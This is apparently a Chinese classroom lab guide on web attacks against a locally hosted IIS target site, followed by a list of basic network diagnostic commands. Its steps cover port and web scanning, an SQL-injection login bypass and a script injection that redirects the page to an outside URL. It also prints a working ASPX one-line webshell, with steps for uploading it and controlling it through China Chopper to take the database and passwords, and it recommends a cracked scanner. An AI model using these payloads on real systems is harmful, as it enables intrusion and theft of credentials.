信息时代的安全威胁
主要介绍了黑客与网络攻击和无处不在的安全威胁。
1. 首先需要利用工具在Windows上部署一个IIS web的网站。
安装IIS相关环境并利用IIS服务器发布靶站源代码(注意应用程序池使用.net 4.0并开启.NET服务)
注意:加粗样式如果.net环境安装不全可在CMD下输入:
“%WINDIR%\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe” -iru -enable
如使用64位的windows系统需要应用程序池设置32位应用程序为true。
2. 使用局域网探查工具LanSee进入设置探查ip结果
3. 再利用端口扫描工具AdvancedPortScanner扫描主机的网段和主机IP。
4. 接下来是WEB扫描,首先打开御剑后台扫描工具开始扫描
5. 再利用网站漏洞扫描工具AWVS,安装破解之后,利用web scanner功能扫描一个网站,观察结果。
6. 漏洞利用——网站后台绕过
主要是根据登陆界面给出的反馈构造永真的SQL语句绕过登陆界面。
7 篡改页面内容
提交代码<script>window.location.href="http://d.mytanwan.com/h/26026.html"</script>
观察之后的效果
上传木马
一句话木马的使用
1、新建文本文档,将文件后缀修改为aspx,书写内容如下:
<%@ Page Language=“Jscript”%> <%eval(Request.Item[“pass”],“unsafe”);%>
2、在系统中寻找文件上传点。
3、上传之前创建的aspx一句话木马文件。
4、设法获得上传文件在网站目录中的文件名称和路径。
5、利用中国菜刀工具连接一句话木马(密码为pass)。
6、获得目标服务器的操作权限并拿到数据库文件。
7、对数据库中的账号密码进行解密。
====================================================================
常见的网络命令
1. ipconfig/all
2. ipconfig/displaydns
3. 利用ping命令向www.baidu.com发送1000字节的数据包
4. 利用ping命令向www.baidu.com发送10000字节的数据包2个
5. 执行nslookup www.hbfu.edu.cn命令,获取该域名所对应的IP地址.
6. 在浏览器中访问网站www.hbfu.edu.cn,利用netstat -n查看本机网络状态,是否有关于www.hbfu.edu.cn网站的连接建立
7. 对局域网内其他主机和www.baidu.com分别执行tracert命令
8. 执行arp -a命令以及执行arp -d命令后立即执行arp -a命令